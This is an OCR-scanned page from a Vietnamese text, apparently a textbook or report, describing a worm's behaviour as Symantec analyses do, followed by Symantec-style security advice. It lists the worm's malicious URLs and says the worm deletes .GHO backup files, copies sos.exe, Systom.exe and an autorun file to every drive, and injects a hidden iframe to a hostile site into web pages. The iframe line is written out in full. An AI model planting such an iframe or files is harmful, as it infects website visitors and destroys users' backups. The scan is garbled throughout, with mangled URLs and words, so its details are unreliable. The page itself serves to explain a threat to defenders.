Tiếp theo nó sẽ connects NVebsites:

             • [http://Jwww.ipl27.cn/lm/xz/iREMOVED]
             • [http://lwww.xinyouyu.cn/xxx/iREMOVED]
             • [http://lwww.ipl27.cn/lm/xz/iREMOVED]
             • [http://]www.ipl27.cn/lm/xz/tj.[REMOVED]
          Nó sẽ xóa tất cả các file có đuôi mở rộng .GHO.
          Tiếp theo nó sẽ copy file vào tất cả các ổ cứng.

             • %DriveLetter%\sos.exe
             • %DriveLetter%\Systom.exe
             %DriveLetter%ViuToRun.inf
          Nó sẽ chèn thêm file vào:

             • Tlie worm adds the following <iframe> tag to all.htm
             files:
             <IfrAmE
             src=[http://] www.ip 127.cn/lm/wm/inde[REMOVED]
             width=50 height=Ox/IfrAmE>
             index.php
             • index.asp
             • deíault.php
             • default.asp
             • conn.asp
           Những khuyến cáo:

           - Để an toàn, Symantec khuyến cáo tất cả những người sử dụng
           và người quản trị  hãy:  Tắt  và gỡ bỏ  những dịch vụ không cần
           thiết. Theo mặc định như hệ điểu hành, thiết đặt lại những dịch
           vụ mà không phải FTP server, telnet và Web server.

           - Nếu những lời đe dọa cùng với việc khai thác những dịch vụ
           mạng,  vô  hiệu  hóa  hoặc  truy  nhập  tới  những  dịch  vụ  ứng
           dụng mạng.

           - Luôn luôn cập nhật những thông tin mới nhất, đặc biệt trên
           những máy chủ có những dịch vụ co thể tiếp cận xuyên qua
 i                                    232